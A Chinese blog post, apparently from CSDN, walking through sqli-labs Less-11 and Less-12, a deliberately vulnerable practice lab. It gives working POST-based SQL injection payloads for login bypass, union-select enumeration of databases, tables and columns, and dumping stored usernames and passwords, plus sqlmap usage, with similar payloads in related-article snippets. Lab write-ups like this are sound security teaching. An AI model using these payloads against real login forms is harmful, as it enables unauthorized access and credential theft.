sqli-labs-master第十一、十二关

最新推荐文章于 2024-02-26 18:06:04 发布
最新推荐文章于 2024-02-26 18:06:04 发布
阅读量1.2k 收藏 7
点赞数 2
分类专栏: 笔记 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43606134/article/details/106068641
版权

前言:我们前十关研究的是get方式注入,我们这里要明确一个概念,GET和POST的数据交流方式:GET是从服务器上获取数据,POST是向服务器传送数据。从第十一关开始就是POST方式交互数据,也就是向服务器传送数据
先查看第十一关页面:
http://192.168.89.134/sqli-labs-master/Less-11/
在这里插入图片描述访问我们的十一关,是一个登陆页面,通常post传送不能在url上看到数据,只能通过抓包工具进行查看等等
我们先尝试一下输入一个’看看怎么反应
在这里插入图片描述
我们那错误分析一波
在这里插入图片描述
这样一来就非常明显了,我们用admin’ and 1=1 #,或者用admin’ or 1=1#
绕过密码
我们看下结果
在这里插入图片描述
上union select联合查询
-admin’ union select 1,2#
在这里插入图片描述
到这里已经很熟悉了,四十米的大刀已经饥渴难耐了,果断查看数据库,用户,版本信息
-admin’ union select database(),user()#
在这里插入图片描述
爆表名
-admin’ union select (select group_concat(table_name) from information_schema.tables where table_schema=‘security’),database() #
在这里插入图片描述
爆列数
-admin’ union select (select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),database() #

在这里插入图片描述
最后查看数据

-admin’ union select (select group_concat(username) from security.users),(select group_concat(password) from security.users) #
在这里插入图片描述
第十二关:
思路和 Less11 一样,只是把’换成’’)这一点小变化

最后我们用sqlmap去跑一下这两关
我们先了解一下什么是sqlmap:
SQL注入比较好用的工具,首推开源工具SQLmap。SQLmap是一个国内外著名的安全稳定性测试工具,可以用来进行自动
化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的安全稳
定性测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系
统命令。

因为是post方式注入,我们要用Burp Target 开启代理进行抓包。
我们这里已经抓好保存为11.txt
在这里插入图片描述
sqlmap -r 指定一个文件
在这里插入图片描述
我们看到了存在注入点并且php、apache、mysql版本。
在这里插入图片描述
我们进一步查看数据库中的库
在这里插入图片描述在这里插入图片描述
存在五个库,我们查看一个security这个库
在这里插入图片描述
在这里插入图片描述
我们接着查看users这张表
在这里插入图片描述
在这里插入图片描述
哈哈是不是很简单,还差最后一步
在这里插入图片描述
在这里插入图片描述
我们是不是拿到了所有的登录用户名和密码!
第十二关操作和这一样

本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助

m__ing
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLi-LABS的Less11-20分析
最新发布
haoahaoahaoahao的博客
02-26 754
试试在username输入1或者1'或者1')或者1'))或者1"或者1")或者1"))那么password为空,发现输入1'或者1')或者1'))的时候会报错,那么通过Less12文章的order by命令发现输入1')的时候是能注入的,不过爆数据库uname=-1') union select 1,database()#&passwd=&submit=Submit的情况和Less12不一样,虽然登录成功却没显示。id=1'会怎么样呢,那么试一下看看发生什么。
sqli-labs-----第11
wyzhxhn的博客
11-09 1607
基于错误的POST型单引号字符型注入
sqli-labs第十一十二(post请求爆库)
qq_42266432的博客
08-23 588
第十一开始,有输入框了,先往里面分别填入两个1看看 页面回显了"尝试登录失败"并且在上面url中并未发现路径后面有提交的参数,说明这不是get请求了,打开hackbar,loadURL发现是以表单方式提交的post请求(刚开始准备使用burp抓包来看请求,结果burp抓取不到本地包就很迷)到这里就可以尝试开始注入了 如上图,uname加上单引号,想要的东西就回显出来了 在将uname变为1’ or 1,上图这个sql报错可以猜出sql的条件目前是uname=‘1’ or 1’ and passwor
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1335
sqli-labs基础篇 第11~17
sqli-labs过程(1-11)
cc777777777的博客
03-23 240
sql注入和sqlmap使用方法
SQL注入之sqli-labs(三)
m0_60716947的博客
04-17 1947
(一)第十一至第十五(持续更新中) (1)第十一 首先依旧是先加两行代码,便于学习
sqli-labs-master【Less-11/12/13/14/15/16】
weixin_44352521的博客
12-18 355
Less-11 进入Less-11之后,可以看到是全新的卡,是一个表单的形式,需要我们填入用户名和密码才可以提交,首先我们随便填入一个用户名和密码看页面会回显给我们什么内容? 我在这块用户名和密码都输入的是123,可以看到登陆尝试失败,不过这都不是重点,我们观察一下地址栏这块,我们提交的数据并没有体现在url中,说明11是POST注入,那么什么是POST注入呢?就是数据从客户端提交到服务器...
Sqlilabs-12
KAKA的博客
07-07 281
这里到了 12 ,是 11 的练习版本,只不过是把单引号换成了 双引号 + 括号,其余的都是一样的。 这里仍然以 hackbar 为例构造 payload: uname=admin") order by 3#&passwd=1&submit=submit uname=admin") order by 2#&passwd=1&submit=submit uname=-admin") union select 1,2#&passwd=1&submit=sub.
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
详细sqli-labs(1-65)通讲解
热门推荐
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs(12)
jimggg的博客
03-20 170
Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入) 应题,基于错误的双引号post字符型注入 uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&a...
sqli-labs靶场第十二
gou1791241251的博客
12-27 719
十二第十一差在了单引号和双引号, admin") or (select table_name from information_schema.tables where table_schema=database())=‘emails’ # 执行同样的操作即可查询出数据库的信息啦。
sqli-labs (less-12)
kukudeshuo的博客
03-09 1063
sqli-labs (less-12) 进入12,我们发现页面和11一样,我们先输入用户名和密码进去,我们发现用户名和密码也是使用POST的方式传了上去,那我们像11一样使用hackbar抓取POST请求 判断注入类型 uname=admin'&passwd=admin&submit=Submit #页面不报错 uname=admin"&passwd=admin&submit=Submit #页面有错误显示 根据输入"时的报错信息我们确定闭合方式为"),也确定为
sqli-labs (less11-less14)
Xi4or0uji
07-29 1484
less 11 post方法单引号绕过报错注入 这跟之前get方法的差不了多少,只是get方法换成了post方法 post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到 uname=1' union select 1,group...
sqli-labs ————less -11(POST注入)
Fly_鹏程万里
05-11 3397
前言从这一开始,我们就进入到了POST注入的世界了。在接下来的几中我们将陆续介绍于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以post的方式提交的服务器的,之后再由服务器端进行验证。Less-11卡界面:我们首先提交一个admin试试看会有什么...
sqli-labs-master之LESS11-LESS16
weixin_43726831的博客
10-10 553
SQL注入之sqli-labs-master LESS11-LESS16 less11-16中,是最基本的POST交互方式下的注入 包括联合查询法,报错型注入,以及布尔型盲注,在此博文中,对其详细过程没有做记录,但是万变不离其宗,这是建立在GET交互方式之上的,所以其方法同GET交互方式下的查询方法类似 联合查询法 报错型注入 布尔型盲注 时间性盲注 LESS-1111 1.通过WEB页面...
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master文件夹复制到Apache或WAMP的web目录下。 4. 在MySQL中创建一个名为“sqli-labs”的数据库,并将sqli-labs文件夹中的“db-creds.inc”文件中的用户名和密码修改为您的MySQL用户名和密码。 5. 在浏览器中访问http://localhost/sqli-labs-master/setup.php,这将创建所需的数据库表和数据。 6. 访问http://localhost/sqli-labs-master/index.html,您将看到sqli-labs的主页。 7. 点击“Lessons”链接,您将看到一系列的SQL注入漏洞测试用例,您可以选择其中的一个进行测试。 8. 在测试用例页面中,您可以看到注入点和注入语句,您可以使用工具如SQLMap等进行注入测试。 希望这个安装教程对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值